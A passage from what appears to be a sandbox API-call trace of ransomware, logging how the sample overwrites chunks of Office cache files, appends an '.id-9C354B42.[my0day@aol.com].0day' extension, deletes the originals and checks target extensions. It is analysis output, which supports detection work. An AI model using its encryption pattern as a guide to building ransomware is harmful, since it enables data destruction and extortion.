lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x301fcb0*=0xc0108, lpOverlapped=0x0) returned 1 [0042.934] SetEndOfFile (hFile=0x1d8) returned 1 [0042.934] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40000) returned 0x3fda0c0 [0042.935] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0042.935] WriteFile (in: hFile=0x1d8, lpBuffer=0x3fda0c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fda0c0*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.936] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0xcc6aa, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0042.936] WriteFile (in: hFile=0x1d8, lpBuffer=0x3fda0c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fda0c0*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.942] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x225400, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0042.942] WriteFile (in: hFile=0x1d8, lpBuffer=0x3fda0c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fda0c0*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.944] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3fda0c0 | out: hHeap=0x5f0000) returned 1 [0042.944] CloseHandle (hObject=0x1d8) returned 1 [0042.945] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0042.945] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0042.945] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0042.945] lstrlenW (lpString=".doc") returned 4 [0042.945] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0042.945] lstrlenW (lpString=".docx") returned 5 [0042.945] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0042.945] lstrlenW (lpString=".pdf") returned 4 [0042.945] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0042.945] lstrlenW (lpString=".xls") returned 4 [0042.945] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0042.945] lstrlenW (lpString=".xlsx") returned 5 [0042.945] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0042.945] lstrlenW (lpString=".ppt") returned 4 [0042.945] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0042.945] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0042.945] lstrlenW (lpString=".zip") returned 4 [0042.945] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0042.945] lstrlenW (lpString=".rar") returned 4 [0042.945] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0042.945] lstrlenW (lpString=".bz2") returned 4 [0042.945] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0042.945] lstrlenW (lpString=".7z") returned 3 [0042.945] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0042.945] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0042.945] lstrlenW (lpString=".dbf") returned 4 [0042.945] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0042.946] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0042.946] lstrlenW (lpString=".1cd") returned 4 [0042.946] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0042.946] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0042.946] lstrlenW (lpString=".jpg") returned 4 [0042.946] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0042.946] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0042.946] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0042.946] lstrlenW (lpString=".doc") returned 4 [0042.946] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0042.946] lstrlenW (lpString=".docx") returned 5 [0042.946] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0042.946] lstrlenW (lpString=".pdf") returned 4 [0042.946] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0042.946] lstrlenW (lpString=".xls") returned 4 [0042.946] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0042.946] lstrlenW (lpString=".xlsx") returned 5 [0042.946] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0042.946] lstrlenW (lpString=".ppt") returned 4 [0042.946] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0042.946] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0042.946] lstrlenW (lpString=".zip") returned 4 [0042.946] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0042.946] lstrlenW (lpString=".rar") returned 4 [0042.946] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0042.946] lstrlenW (lpString=".bz2") returned 4 [0042.946] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0042.946] lstrlenW (lpString=".7z") returned 3 [0042.946] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0042.946] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0042.946] lstrlenW (lpString=".dbf") returned 4 [0042.946] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0042.946] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0042.946] lstrlenW (lpString=".1cd") returned 4 [0042.947] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0042.947] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0042.947] lstrlenW (lpString=".jpg") returned 4 [0042.947] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0042.947] lstrcmpiW (lpString1=".EXE", lpString2=".0day") returned 1 [0042.947] lstrlenW (lpString="DW20.EXE") returned 8 [0042.947] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0043.536] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=838536) returned 1 [0043.569] CloseHandle (hObject=0x1a0) returned 1 [0043.569] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe")) returned 0x2020 [0043.569] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0043.569] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0043.569] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.569] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.570] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0043.570] GetLastError () returned 0x0 [0043.570] ReadFile (in: hFile=0x1a0, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x301fed4*=0xccb88, lpOverlapped=0x0) returned 1 [0043.590] WriteFile (in: hFile=0x198, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xccb90, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x301fc9c*=0xccb90, lpOverlapped=0x0) returned 1 [0043.605] ReadFile (in: hFile=0x1a0, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x301fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.605] WriteFile (in: hFile=0x198, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x301fc9c*=0xe4, lpOverlapped=0x0) returned 1 [0043.605] SetEndOfFile (hFile=0x198) returned 1 [0043.605] CloseHandle (hObject=0x198) returned 1 [0043.605] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.605] SetEndOfFile (hFile=0x1a0) returned 1 [0043.611] CloseHandle (hObject=0x1a0) returned 1 [0043.611] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0043.611] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe")) returned 1 [0043.612] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0043.612] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0043.612] lstrlenW (lpString=".doc") returned 4 [0043.612] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0043.612] lstrlenW (lpString=".docx") returned 5 [0043.612] lstrcmpiW (lpString1=".docx", lpString2="0.EXE") returned -1 [0043.612] lstrlenW (lpString=".pdf") returned 4 [0043.612] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0043.612] lstrlenW (lpString=".xls") returned 4 [0043.612] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0043.612] lstrlenW (lpString=".xlsx") returned 5 [0043.612] lstrcmpiW (lpString1=".xlsx", lpString2="0.EXE") returned -1 [0043.612] lstrlenW (lpString=".ppt") returned 4 [0043.612] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0043.612] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0043.612] lstrlenW (lpString=".zip") returned 4 [0043.612] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0043.612] lstrlenW (lpString=".rar") returned 4 [0043.612] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0043.612] lstrlenW (lpString=".bz2") returned 4 [0043.612] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0043.612] lstrlenW (lpString=".7z") returned 3 [0043.612] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0043.612] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0043.612] lstrlenW (lpString=".dbf") returned 4 [0043.612] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0043.612] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0043.612] lstrlenW (lpString=".1cd") returned 4 [0043.612] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0043.612] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0043.612] lstrlenW (lpString=".jpg") returned 4 [0043.612] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0043.613] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0043.613] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0043.613] lstrlenW (lpString=".doc") returned 4 [0043.613] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0043.613] lstrlenW (lpString=".docx") returned 5 [0043.613] lstrcmpiW (lpString1=".docx", lpString2="0.EXE") returned -1 [0043.613] lstrlenW (lpString=".pdf") returned 4 [0043.613] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0043.613] lstrlenW (lpString=".xls") returned 4 [0043.613] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0043.613] lstrlenW (lpString=".xlsx") returned 5 [0043.613] lstrcmpiW (lpString1=".xlsx", lpString2="0.EXE") returned -1 [0043.613] lstrlenW (lpString=".ppt") returned 4 [0043.613] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0043.613] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0043.613] lstrlenW (lpString=".zip") returned 4 [0043.613] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0043.613] lstrlenW (lpString=".rar") returned 4 [0043.613] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0043.613] lstrlenW (lpString=".bz2") returned 4 [0043.613] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0043.613] lstrlenW (lpString=".7z") returned 3 [0043.613] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0043.613] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0043.613] lstrlenW (lpString=".dbf") returned 4 [0043.613] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0043.613] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0043.613] lstrlenW (lpString=".1cd") returned 4 [0043.613] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0043.613] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0043.613] lstrlenW (lpString=".jpg") returned 4 [0043.613] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0043.614] lstrcmpiW (lpString1=".msi", lpString2=".0day") returned 1 [0043.614] lstrlenW (lpString="OfficeMUI.msi") returned 13 [0043.614] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0043.614] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=3702272) returned 1 [0043.614] CloseHandle (hObject=0x1a0) returned 1 [0043.614] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi")) returned 0x2020 [0043.614] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0043.614] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi.id-9c354b42.[my0day@aol.com].0day")) returned 1 [0043.615] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0043.615] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0x0) returned 1 [0043.615] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0043.615] ReadFile (in: hFile=0x1a0, lpBuffer=0x3a60058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3a60058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0043.745] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x12d4aa, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0043.745] ReadFile (in: hFile=0x1a0, lpBuffer=0x3aa0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3aa0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0043.750] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0043.750] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x347e00, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0043.750] ReadFile (in: hFile=0x1a0, lpBuffer=0x3ae0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3ae0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0043.764] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.764] WriteFile (in: hFile=0x1a0, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xc0106, lpNumberOfBytesWritten=0x301fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x301fcb0*=0xc0106, lpOverlapped=0x0) returned 1 [0044.074] SetEndOfFile (hFile=0x1a0) returned 1 [0044.173] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40000) returned 0x3ed2068 [0044.179] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0044.181] WriteFile (in: hFile=0x1a0, lpBuffer=0x3ed2068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ed2068*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.194] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x12d4aa, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0044.194] WriteFile (in: hFile=0x1a0, lpBuffer=0x3ed2068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ed2068*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.198] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x347e00, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0044.198] WriteFile (in: hFile=0x1a0, lpBuffer=0x3ed2068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ed2068*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.200] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ed2068 | out: hHeap=0x5f0000) returned 1 [0044.200] CloseHandle (hObject=0x1a0) returned 1 [0044.200] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0044.200] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0044.200] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0044.200] lstrlenW (lpString=".doc") returned 4 [0044.200] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0044.200] lstrlenW (lpString=".docx") returned 5 [0044.200] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0044.200] lstrlenW (lpString=".pdf") returned 4 [0044.200] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0044.200] lstrlenW (lpString=".xls") returned 4 [0044.200] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0044.200] lstrlenW (lpString=".xlsx") returned 5 [0044.200] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0044.200] lstrlenW (lpString=".ppt") returned 4 [0044.201] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0044.201] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0044.201] lstrlenW (lpString=".zip") returned 4 [0044.201] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0044.201] lstrlenW (lpString=".rar") returned 4 [0044.201] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0044.201] lstrlenW (lpString=".bz2") returned 4 [0044.201] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0044.201] lstrlenW (lpString=".7z") returned 3 [0044.201] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0044.201] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0044.201] lstrlenW (lpString=".dbf") returned 4 [0044.201] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0044.201] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0044.201] lstrlenW (lpString=".1cd") returned 4 [0044.201] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0044.201] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0044.201] lstrlenW (lpString=".jpg") returned 4 [0044.201] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0044.201] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0044.201] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0044.201] lstrlenW (lpString=".doc") returned 4 [0044.201] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0044.201] lstrlenW (lpString=".docx") returned 5 [0044.201] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0044.201] lstrlenW (lpString=".pdf") returned 4 [0044.201] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0044.201] lstrlenW (lpString=".xls") returned 4 [0044.201] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0044.201] lstrlenW (lpString=".xlsx") returned 5 [0044.201] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0044.201] lstrlenW (lpString=".ppt") returned 4 [0044.201] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0044.201] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0044.201] lstrlenW (lpString=".zip") returned 4 [0044.201] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0044.202] lstrlenW (lpString=".rar") returned 4 [0044.202] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0044.202] lstrlenW (lpString=".bz2") returned 4 [0044.202] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0044.202] lstrlenW (lpString=".7z") returned 3 [0044.202] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0044.202] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0044.202] lstrlenW (lpString=".dbf") returned 4 [0044.202] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0044.202] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0044.202] lstrlenW (lpString=".1cd") returned 4 [0044.202] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0044.202] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0044.202] lstrlenW (lpString=".jpg") returned 4 [0044.202] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0044.202] lstrcmpiW (lpString1=".cab", lpString2=".0day") returned 1 [0044.202] lstrlenW (lpString="AccLR.cab") returned 9 [0044.202] CreateFileW (lpFileName="C:\\MSOCache\\All 